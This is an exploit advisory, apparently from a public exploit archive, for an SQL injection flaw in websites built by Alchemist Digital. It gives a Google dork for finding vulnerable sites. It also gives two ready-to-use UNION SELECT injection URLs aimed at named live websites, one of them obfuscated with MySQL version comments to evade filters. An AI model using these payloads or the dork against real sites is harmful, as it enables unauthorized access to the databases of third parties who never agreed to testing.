*********************************************************
#Exploit Title: Alchemist Digital – SQL Injection vulnerability
#Date: 2020-08-16
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed by Alchemist Digital LLC"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Designed by Alchemist Digital LLC"
Demo 1:
http://asktrident.com/services.php?id=-6%27%20union%20select%201,version(),3,4,5,6--+
Demo 2:
http://www.oct.ae/trailer-product.php?id=-3%27%20/*!50000Union*/%20/*!50000sElect*/%2011111111,222222,3333333,VERSION(),555555--+
*********************************************************
#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email : mr.mansoori@yahoo.com
*********************************************************